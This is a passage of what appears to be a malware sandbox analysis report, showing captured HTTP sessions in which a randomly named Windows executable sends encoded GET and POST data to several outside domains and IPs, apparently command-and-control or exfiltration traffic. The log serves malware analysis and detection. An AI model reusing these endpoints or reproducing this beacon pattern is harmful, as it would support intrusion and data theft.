              Data Ascii: 0th4S=g1Eybgs1boaXzoDsaUL66PAbgpurDhuYsA2B1MCeAOeO33KzFIfTiflxY5Q0dxPlQACE8/5X60s46BmLqRg3Qitr8ZdxBsbRDl+HBd9fI16azAf663oKvItzMWdVe1i9tiNxJJ2sX6R942V/08YXSPQaUTZLylLzeY4qAnwEjfB9xlKLPhRDjxTCEYFa1OXcLQwhwLpLxn97mCF1yCCXjKbLaWRJkPR6wzXRwoHMRAee0KKeXva9zSC0cD8Veyjn5MpLPbaRt4cZ94m+VjStLFzlmPuannRYb/gm9JW/LZIjekMCcQuZAH9jvXi30XJ+dYMimL8iXolwv+EOvZ+HWPrk4Zz418ft4p6SI4tZKOO0YAl6L/b5yTKqstQNd4buwdKddOELFA7FnNL8YY47F1XONCu/4ij/lB9DiD/m93sepaWLGtceHPVXfThtP6bt0jmPFRuLwVTj7B6CVguWnc3eYUzl+cu1m1+MP0wPClgO+K8y0JKJYZQloxGNhePM15G2eu+r5+KikSlHv4tjhcFEVXkRe+Vu4drdliJmV+JEcRInLUS2PaDO9zgGtxKp2sTY+7wIN+NfzAjOyo9K3CvnqZISTz84D9+eUJy13JjrTfTpFhXPtDt6s3etCAOz3oUuPJIpW7bPBeXnems2wm+OQU9FO8MQhsJ9cTHbkAAL4IOvNln2HikZCIZcmHfrmBbCFMNgW3b+rTiNkVtZSqdWEtFWazQ9aJ8ps4DqTzrwNJgQ/9GkjecNW+Qa3IMMvQQnDtChNDgSzJQR8YVQv7vVYyRwtmVeSmHVDBiNKsjwpeLHv7wZBnNtc+nvzr3GZI7B7XLrysh6sBlPRGE45wfMe64cNqOLYKosN7ji3ehVot6Ei+NsfnMUTZnRg3JxaRA4vHEPZSAbYhH9fL8J6P3DLznF2NEw5hUmE5kaOdiLyFftjooadirCTvWl/M2jXSW1ZoCJ/ldllxXHnOC61e5YiwuSxTI1Uicit5lk9gE5LK [TRUNCATED]
              Sep 22, 2024 17:57:20.198420048 CEST1033INHTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Sun, 22 Sep 2024 15:57:20 GMT
              server: LiteSpeed
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              12192.168.2.1149726172.96.191.39806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:57:21.830529928 CEST548OUTGET /3qit/?0th4S=t3sSYQcRGIG2xp6lfBDs7+5agoifCQSrmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYUy0f6KZWOuHAGxqpBfNEWVS56C/Y70R0u+E=&u2pl=VvmP2xFp HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.bola88site.one
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Sep 22, 2024 17:57:22.791858912 CEST1033INHTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Sun, 22 Sep 2024 15:57:22 GMT
              server: LiteSpeed
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              13192.168.2.1149727217.70.184.50806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:57:27.983398914 CEST824OUTPOST /nxfn/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.languagemodel.pro
              Origin: http://www.languagemodel.pro
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 202
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.languagemodel.pro/nxfn/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 44 6e 51 6e 36 6b 68 31 57 57 33 43 52 61 62 32 76 34 38 4d 45 50 69 54 49 43 71 4a 2b 4e 75 73 56 78 6f 50 4c 67 41 77 78 75 47 68 6c 6a 41 2f 42 79 6b 66 33 66 55 78 55 4b 52 57 56 56 33 33 6f 4d 4f 36 34 2b 69 4c 5a 6c 61 51 54 30 78 57 70 4b 44 2f 47 35 39 58 58 5a 78 72 78 6e 61 4e 4d 58 78 6f 43 4e 47 78 35 32 2b 49 77 4c 46 76 73 5a 54 6e 6e 32 51 6a 37 31 43 65 4b 64 4e 47 62 72 44 50 62 49 36 4e 62 51 2f 73 64 57 41 30 6a 47 31 67 63 57 34 71 72 34 59 41 72 62 5a 44 34 4a 4a 68 55 76 38 72 77 77 75 52 32 42 57 34 63 57 76 56 2f 67 3d 3d
              Data Ascii: 0th4S=3hfisZtcaPw+DnQn6kh1WW3CRab2v48MEPiTICqJ+NusVxoPLgAwxuGhljA/Bykf3fUxUKRWVV33oMO64+iLZlaQT0xWpKD/G59XXZxrxnaNMXxoCNGx52+IwLFvsZTnn2Qj71CeKdNGbrDPbI6NbQ/sdWA0jG1gcW4qr4YArbZD4JJhUv8rwwuR2BW4cWvV/g==
              Sep 22, 2024 17:57:28.617199898 CEST608INHTTP/1.1 501 Unsupported method ('POST')
              Server: nginx
              Date: Sun, 22 Sep 2024 15:57:28 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              14192.168.2.1149728217.70.184.50806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:57:30.589766026 CEST844OUTPOST /nxfn/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.languagemodel.pro
              Origin: http://www.languagemodel.pro
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 222
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.languagemodel.pro/nxfn/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 43 44 55 6e 34 47 4a 31 44 47 33 4e 50 71 62 32 6c 59 38 41 45 50 75 54 49 44 75 67 2f 2f 4b 73 56 51 59 50 4b 6b 55 77 79 75 47 68 33 44 42 31 46 79 6c 54 33 66 59 54 55 49 46 57 56 55 54 33 6f 49 47 36 35 4a 32 4b 62 31 61 53 59 55 78 55 32 36 44 2f 47 35 39 58 58 5a 6c 4e 78 6a 4f 4e 4d 6e 68 6f 46 66 75 79 78 57 2b 4c 34 72 46 76 6f 5a 54 6a 6e 32 52 30 37 33 32 6b 4b 66 31 47 62 75 2f 50 59 5a 36 4b 43 67 2b 6c 41 47 42 42 6d 31 51 75 56 42 73 37 6c 72 6b 6a 69 2f 73 6a 39 50 59 37 45 4d 31 38 7a 6a 6d 54 69 6e 33 49 56 6e 4b 63 6b 76 49 30 4f 4d 46 4b 4d 35 62 56 72 7a 76 44 46 77 79 50 78 77 49 3d
              Data Ascii: 0th4S=3hfisZtcaPw+CDUn4GJ1DG3NPqb2lY8AEPuTIDug//KsVQYPKkUwyuGh3DB1FylT3fYTUIFWVUT3oIG65J2Kb1aSYUxU26D/G59XXZlNxjONMnhoFfuyxW+L4rFvoZTjn2R0732kKf1Gbu/PYZ6KCg+lAGBBm1QuVBs7lrkji/sj9PY7EM18zjmTin3IVnKckvI0OMFKM5bVrzvDFwyPxwI=
              Sep 22, 2024 17:57:31.226824999 CEST608INHTTP/1.1 501 Unsupported method ('POST')
              Server: nginx
              Date: Sun, 22 Sep 2024 15:57:31 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              15192.168.2.1149729217.70.184.50806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:57:33.135000944 CEST1857OUTPOST /nxfn/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.languagemodel.pro
              Origin: http://www.languagemodel.pro
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 1234
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.languagemodel.pro/nxfn/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 43 44 55 6e 34 47 4a 31 44 47 33 4e 50 71 62 32 6c 59 38 41 45 50 75 54 49 44 75 67 2f 2f 43 73 56 43 51 50 4c 46 55 77 7a 75 47 68 30 44 42 30 46 79 6c 65 33 66 51 58 55 49 4a 6f 56 58 37 33 70 71 65 36 6f 49 32 4b 52 31 61 53 58 30 78 58 70 4b 44 75 47 35 73 51 58 5a 31 4e 78 6a 4f 4e 4d 69 6c 6f 54 64 47 79 33 57 2b 49 77 4c 46 56 73 5a 54 50 6e 32 49 42 37 33 7a 54 4b 75 56 47 62 4f 50 50 64 76 75 4b 4b 67 2b 72 42 47 42 5a 6d 31 73 6c 56 46 4e 58 6c 71 51 61 69 34 59 6a 2f 35 42 2b 57 4f 70 59 68 42 36 46 39 31 6e 50 4a 6b 7a 59 6a 2f 67 4d 50 2b 68 2b 66 4e 62 70 32 53 4b 64 63 7a 2b 6b 6c 45 56 61 72 63 73 4c 70 58 59 41 55 5a 44 6a 56 31 4d 37 6c 75 45 55 39 74 77 6f 64 61 4a 63 72 78 63 72 53 39 4b 79 53 55 41 48 53 46 6f 4a 39 64 69 6c 4f 62 65 4a 30 57 70 68 38 6f 44 43 44 61 4f 37 61 52 2f 33 64 76 4b 6d 51 6d 54 76 71 71 51 69 54 67 34 4c 38 4c 5a 6a 74 37 55 4b 51 58 5a 45 71 6d 36 4a 71 70 7a 51 51 37 6a 38 77 74 6f 38 4b 2b 4d 53 [TRUNCATED]
              Data Ascii: 0th4S=3hfisZtcaPw+CDUn4GJ1DG3NPqb2lY8AEPuTIDug//CsVCQPLFUwzuGh0DB0Fyle3fQXUIJoVX73pqe6oI2KR1aSX0xXpKDuG5sQXZ1NxjONMiloTdGy3W+IwLFVsZTPn2IB73zTKuVGbOPPdvuKKg+rBGBZm1slVFNXlqQai4Yj/5B+WOpYhB6F91nPJkzYj/gMP+h+fNbp2SKdcz+klEVarcsLpXYAUZDjV1M7luEU9twodaJcrxcrS9KySUAHSFoJ9dilObeJ0Wph8oDCDaO7aR/3dvKmQmTvqqQiTg4L8LZjt7UKQXZEqm6JqpzQQ7j8wto8K+MSqzh/lygzhKTtfMJ65QFl2r1tk+8keesun/LXud3fRomXeu/lcZ6vJZ4Gpqg8wqZnvzB2RFoOjBo0QUdNYFxS2B/I7tuoOt+KDeGiqWAfu2Xz1mNnVPpEr/59voHNxV0NJEpJbBua23SS8CMAsC3nodE7yu+KY4W9JG7kJYJv8xsL4r5IpuEcTkQVxA+neoL8x3/5weMjPVjobZOU54d55TbkGeOVk2C24c279wDN91nRaG6RMxKxqU0S0DitmyVdZhnzoyShujw11zF7kj+FOW1RSjI0RQIoVQ0EnUU/WEOxWRVeX1LbYUhulcImg1s5MisumzrY8tLJYiTiEmqvzaUkigFSrpluSubJBny1bEEDSgz+bbO/PNDdGXrOCY9Li7V2SqJg/n3jsSA6CLR+lSuMk82NHwF6onptfhcjQ3KOxjIlchzSqJWpCUJoYctMEYJdopQxTQaaJ6NB105enUrV4hKjzSg3D4W89tR/5DFMSyn/6s/Vvmwy+JgzK4iOyemmosHQ36HrifwV7enj3bgEsCdDVop66qoFV0OpdmPvOF80EjIk/upc5wMgvlD7WIG8oO71kHpe9qQzJy/ZtXwqmXlofEuWaMSjs+3bXZZTuB9k5+TMYR57VPdpG9w3m20Gk/UXOvxJeBJK95R2L5/tmKr6D2xgSe [TRUNCATED]
              Sep 22, 2024 17:57:33.725753069 CEST608INHTTP/1.1 501 Unsupported method ('POST')
              Server: nginx
              Date: Sun, 22 Sep 2024 15:57:33 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              16192.168.2.1149730217.70.184.50806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:57:35.674160004 CEST551OUTGET /nxfn/?0th4S=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVbXaFalsRh/PHN6RHd5lVuz72HidyE/KKxQw=&u2pl=VvmP2xFp HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.languagemodel.pro
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Sep 22, 2024 17:57:36.300060987 CEST1236INHTTP/1.1 200 OK
              Server: nginx
              Date: Sun, 22 Sep 2024 15:57:36 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Vary: Accept-Encoding
              Vary: Accept-Language
              Data Raw: 37 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 [TRUNCATED]
              Data Ascii: 79d<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>languagemodel.pro</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https: [TRUNCATED]
              Sep 22, 2024 17:57:36.300139904 CEST914INData Raw: 3d 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 3c 2f 73 74 72 6f 6e 67 3e 3c 2f
              Data Ascii: =languagemodel.pro"><strong>View the WHOIS results of languagemodel.pro</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class=


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              17192.168.2.114973163.250.47.40806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:57:42.055665970 CEST803OUTPOST /3bdq/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.kexweb.top
              Origin: http://www.kexweb.top
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 202
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.kexweb.top/3bdq/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
